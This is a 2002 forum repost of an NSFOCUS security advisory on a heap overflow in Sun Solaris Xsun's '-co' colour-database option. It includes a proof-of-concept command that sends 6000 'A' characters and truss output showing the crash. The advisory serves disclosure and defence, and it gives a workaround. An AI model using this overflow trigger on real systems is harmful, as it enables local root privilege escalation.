永远的FLASH 
级别:刀光雪影版主
威望:3
经验:1
货币:5852
体力:
来源:江苏
总发帖数:2264
注册日期:2002-02-11 |
|
 查看  邮件  主页  QQ  消息  引用  复制  下载
Sun Solaris Xsun
"-co" heap overflow
NSFOCUS Security
Advisory(SA2002-01)
Topic: Sun Solaris Xsun "-co" heap
overflow
Release Date: 2002-4-02
CVE CAN ID :
CAN-2002-0158
Affected system:
================
- Sun Solaris 2.6 (SPARC/x86)
- Sun Solaris 7
(SPARC/x86)
- Sun Solaris 8 (SPARC/x86)
Impact:
=========
NSFOCUS Security Team has found a buffer
overflow vulnerability in Xsun shiped
with Solaris system when
processing a command line parameter "-co", which could
enable a
local attacker to run arbitrary code with root user/root group
privilege.
Description:
============
Xsun is
an Xwindow server (for X11) on Solaris platform. It is installed in
/usr/openwin/bin/. On SPARC platform, it is configured to have
setgid root
attribute, and it is configured to have setuid root
attribute on x86 platform.
Xsun supports a command line
parameter "-co" to specify color database file.
But the
application does not perform length check of filename inputted by
user,
which would be used by an attacker to cause heap overflow.
With carefully
constructed data, an attacker might be able to
run arbitrary code with root
privilege.
In case that the
attacker provide an overlong filename (for example, longer
than
6000 bytes) for the "-co", it would overflow a dynamic allocated
buffer.
The attacker could modify arbitrary memory address (such
as saved return
address, and function pointer, etc.) with some
features of malloc()/free()
implementation by overwriting the
border data structure of the next
dynamic memory chunk.
On SPARC platform, attacker could obtain root group
privilege; on x86
platform, attacker could obtain root user
privilege.
Exploit:
==========
[root@
/tmp]> uname -a
SunOS sun8 5.8 Generic sun4u sparc
SUNW,Ultra-5_10
[root@ /tmp]> truss /usr/openwin/bin/Xsun :1
-co ****perl -e 'print "A"x6000'****
.....
mmap(0x00000000,
8404992, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_NORESERVE, 4, 0) =
0xFE400000
mprotect(0xFE400000, 8192, PROT_NONE) = 0
mprotect(0xFEC02000, 8192, PROT_NONE) = 0
open64("A...AAAAA", O_RDONLY) Err#78 ENAMETOOLONG
Couldn't
open RGB_DB 'write(2, " C o u l d n ' t o p e".., 22) = 22
AAA...AAAAAAAAAAAAAAAAAAAAAAAAAAwrite(2, " A A A A A A A A A A A
A".., 6000) = 6000
'
write(2, " '\n", 2) = 2
getpid() =
21677 [21676]
getrlimit(RLIMIT_NOFILE, 0xFFBEE3F8) = 0
setrlimit(RLIMIT_NOFILE, 0xFFBEE3F8) = 0
uname(0xFFBEDB30) =
1
getrlimit(RLIMIT_NOFILE, 0xFFBEE128) = 0
so_socket(2, 2,
0, "", 1) = 0
setsockopt(0, 6, 1, 0xFFBEE124, 4, 1) = 0
setsockopt(0, 65535, 8, 0xFFBEE120, 4, 1) = 0
setsockopt(0,
65535, 4, 0xFFBEE194, 4, 1) = 0
bind(0, 0xFFBEE1B8, 16, 3) = 0
setsockopt(0, 65535, 128, 0x00175D40, 8, 1) = 0
listen(0, 5,
1) = 0
getsockname(0, 0xFFBEE144, 0xFFBEE154, 1) = 0
uname(0xFFBEDB30) = 1
Incurred fault #5, FLTACCESS %pc =
0xFECC14C8
siginfo: SIGBUS BUS_ADRALN addr=0x41414141
Received signal #10, SIGBUS [default]
siginfo: SIGBUS
BUS_ADRALN addr=0x41414141
*** process killed ***
Workaround:
===================
Temporarily
remove the suid root or sgid root attribute of Xsun:
# chmod
a-s /usr/openwin/bin/Xsun
Vendor Status:
==============
2001.8.08 We have informed Sun of this
problem.
2001.8.08 Sun replied that they have forward the
problem to corresponding
team, but no further response up to
now.
In our testing, Xsun with the latest security patch
still has the problem.
Additional Information:
========================
The Common Vulnerabilities and
Exposures (CVE) project has
assigned the name CAN-2002-0158 to
this issue. This is a
candidate for inclusion in the CVE list
(http://cve.mitre.org),
which standardizes names for security
problems. Candidates
may change significantly before they become
official CVE entries.
DISCLAIMS:
==========
THE
INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR
IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO
EVENTSHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER
INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF
BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR
REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS
NOT MODIFIED IN ANY WAY.
Copyright 1999-2002 NSFOCUS. All
Rights Reserved. Terms of use.
NSFOCUS Security Team
<security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY
CO.,LTD
(http://www.nsfocus.com)
|
首页 
小榕软件实验室 
刀光雪影 
Solaris heap overflow[推荐] 
将此页发给您的朋友
编辑
删除
发表于 2002-04-13.13:09:39 
IP: 
